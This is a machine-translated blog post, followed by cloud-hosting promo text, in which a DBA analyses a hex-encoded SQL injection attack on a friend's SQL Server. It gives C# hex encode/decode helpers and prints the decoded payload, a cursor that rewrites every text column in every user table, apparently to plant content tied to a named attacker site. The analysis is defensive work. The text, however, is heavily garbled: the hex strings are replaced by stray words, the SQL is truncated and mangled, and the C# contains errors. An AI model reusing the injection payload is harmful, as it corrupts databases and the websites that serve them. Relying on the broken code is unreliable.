Comments: Few people do this in China, but as a DBA, these aspects should be considered, because SQL server provides a powerful permission control solution, of course, this problem should be considered from the program. In this case, it should be directly operated on the server or the light injected by the jump.
Today, a friend encountered a problem. His SQL server database was executed with a statement.
DEcLaRe @ s vArChAr (8000) sEt @ s = merge eXeC (@ s )--
From 0x, we can see that this is a hexadecimal-encoded SQL statement.
So I thought about decoding it:
The method for encoding and decoding a hexadecimal string is as follows:
The Code is as follows:
///
/// Convert a string to a hexadecimal string
///
///
/// Encoding, such as "UTF-8", "gb2312"
/// Whether each character is separated by a comma
///
Public static string ToHex (string s, string charset, bool fenge)
{
If (s. Length % 2 )! = 0)
{
S + = ""; // Space
// Throw new ArgumentException ("s is not valid chinese string! ");
}
System. Text. Encoding chs = System. Text. Encoding. GetEncoding (charset );
Byte [] bytes = chs. GetBytes (s );
String str = "";
For (int I = 0; I <bytes. Length; I ++)
{
Str + = string. Format ("{0: X}", bytes [I]);
If (fenge & (I! = Bytes. Length-1 ))
{
Str + = string. Format ("{0 }",",");
}
}
Return str. ToLower ();
} </P> <p> ///
/// Convert from hexadecimal to utf-encoded string
///
///
/// Encoding, such as "UTF-8", "gb2312"
///
Public static string UnHex (string hex, string charset)
{
If (hex = null)
Throw new ArgumentNullException ("hex ");
Hex = hex. Replace (",","");
Hex = hex. Replace ("\ n ","");
Hex = hex. Replace ("\\","");
Hex = hex. Replace ("","");
If (hex. Length % 2! = 0)
{
Hex + = "20"; // Space
Throw new ArgumentException ("hex is not a valid number! "," Hex ");
}
// You Need to Convert hex to a byte array.
Byte [] bytes = new byte [hex. Length/2];
For (int I = 0; I <bytes. Length; I ++)
{
Try
{
// Each two characters is a byte.
Bytes [I] = byte. Parse (hex. Substring (I * 2, 2 ),
System. Globalization. NumberStyles. HexNumber );
}
Catch
{
// Rethrow an exception with custom message.
Throw new ArgumentException ("hex is not a valid hex number! "," Hex ");
}
}
System. Text. Encoding chs = System. Text. Encoding. GetEncoding (charset); </p> <p> return chs. GetString (bytes );
}
The code is decoded as follows:
The Code is as follows:
Private static void TestHexStringDecode ()
{
String oldSql = "success ";
Console. Write (System. Web. HttpUtility. UrlDecode (UnHex (oldSql, "UTF-8"). ToLower ()));
}
In this way, its prototype is displayed.
The Code is as follows:
Declare @ t varchar (255), @ c varchar (255) declare table_cursor cursor for select
. Name, B. name from sysobjects a, syscolumns B where a. id = B. id and a. xtype = 'U' and
(B. xtype = 99 or B. xtype = 35 or B. xtype = 231 or B. xtype = 167) open table_cursor fetch
Next from table_cursor into @ t, @ c while (@ fetch_status = 0) begin exec ('Update ['
@ T'] set ['@ C'] = rtrim (convert (varchar, [' @ C']) ''"> ose table_cursor deallocate table_cursor
The website of the injected person is a.ppmmoo.cn.
You should pay more attention to this injection at ordinary times. You can control the permissions on the database to avoid the injection of the above Code. According to a friend, this person is injected on a fiber-optic computer. It is estimated that it is used as a zombie, or servers ~~~
In addition, the http://home2.paulschou.net/tools/xlate/ URL can be used to decode Hex encoded strings.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
